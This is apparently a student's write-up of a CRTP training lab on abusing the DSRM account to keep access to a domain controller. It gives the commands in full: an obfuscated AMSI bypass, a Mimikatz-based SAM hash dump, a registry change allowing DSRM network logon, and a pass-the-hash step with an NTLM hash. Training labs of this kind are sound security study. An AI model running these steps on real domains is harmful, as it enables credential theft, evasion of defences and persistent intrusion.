CRTP Lab 11

Task

Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.

We already have access to dcorp-dc. To have better persistence, we enable DSRM for local admin and modify the registry to ensure that we can remotely logon to DC.

First, we use PSRemoting to access dcorp-dc.

# Run InviShell
C:\Users\student372>C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat

# Use PSRemoting to login to dcorp-dc
PS C:\Users\student372> $sess = New-PSSession dcorp-dc
PS C:\Users\student372> Enter-PSSession -Session $sess

Disable AMSI on dcorp-dc
[dcorp-dc]: PS C:\Users\svcadmin\Documents> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

[dcorp-dc]: PS C:\Users\svcadmin\Documents> exit

Now, let's copy Invoke-Mimi to dcorp-dc and dump hashes.

Copy Invoke-Mimi to DC
PS C:\Users\student372> Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess
PS C:\Users\student372> Enter-PSSession -Session $sess


[dcorp-dc]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command '"token::elevate" "lsadump::sam"'

Now we can set the DSRM registry value so that DSRM admin can logon to DC from network.

[dcorp-dc]: PS C:\Users\svcadmin\Documents> New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

From our local system, we can Pass the Hash for DSRM admin:

PS C:\AD\Tools> . C:\AD\Tools\Invoke-Mimi.ps1
PS C:\AD\Tools> Invoke-Mimi -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

Last updated